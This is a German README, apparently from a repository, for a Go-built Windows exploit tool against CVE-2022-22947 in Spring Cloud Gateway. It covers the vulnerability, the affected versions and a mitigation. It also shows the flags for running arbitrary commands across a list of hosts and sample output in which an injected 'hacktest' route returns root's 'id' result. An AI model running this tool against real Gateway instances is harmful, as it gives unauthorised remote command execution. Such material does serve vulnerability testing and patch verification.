
Go-basierter Exploit für CVE-2022-22947, der Remote-Code-Ausführung auf anfälligen Spring Cloud Gateway-Instanzen über manipulierte Actuator-Anfragen ermöglicht.
Spring Cloud Gateway ist ein neues Projekt von Spring Cloud, das darauf abzielt, Netflix Zuul zu ersetzen. Es basiert auf Technologien wie Spring 5.0+, Spring Boot 2.0+, WebFlux (basierend auf dem hochleistungsfähigen Reactor-Pattern-Netty-Framework mit asynchronem, nicht-blockierendem Modell) und bietet eine höhere Leistung als Zuul. Offizielle Tests zeigen, dass Gateway 1,6-mal schneller ist als Zuul und eine einfache, effektive, einheitliche API-Routing-Verwaltung für Microservice-Architekturen bereitstellt. Die Remote Code Execution-Schwachstelle in Spring Cloud Gateway (CVE-2022-22947) tritt im Actuator-Endpunkt der Spring Cloud Gateway-Anwendung auf, der bei Aktivierung, Offenlegung und unsicherer Konfiguration anfällig für Code-Injection ist. Ein Angreifer kann diese Schwachstelle ausnutzen, um bösartige Anfragen zu erstellen, die die Ausführung beliebigen entfernten Codes auf dem Zielhost ermöglichen. CVSS-Score dieser Schwachstelle: 9.8, Schweregrad: Kritisch
CVE-2022-22947
3.1.0 3.0.0 bis 3.0.6 Versionen vor 3.0.0
management.endpoint.gateway.enable:false deaktiviert werdenDieses Skript wurde in Go geschrieben und als ausführbare Windows-Datei kompiliert.
-cmd string Auszuführender Befehl (Standard: "id") -host string Zu prüfende Adresse oder Pfad zur Datei mit Hosts (Standard: "http://127.0.0.1:80")

Beispiel:
./cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
>cve_2022_22947.exe -host "C:\\Users\\Administrator\\Desktop\\hostlist.txt"
result: http://127.0.0.1:10089 : {"predicate":"RouteDefinitionRouteLocator$$Lambda$978/705851885","route_id":"hacktest","filters":["[[AddResponseHeader Result = 'uid=0(root) gid=0(root) groups=0(root)\n'], order = 1]"],"uri": "http://example.com:80","order":0}
vulnerable host:
http://127.0.0.1:10089
https://nosec.org/home/detail/4971.html https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947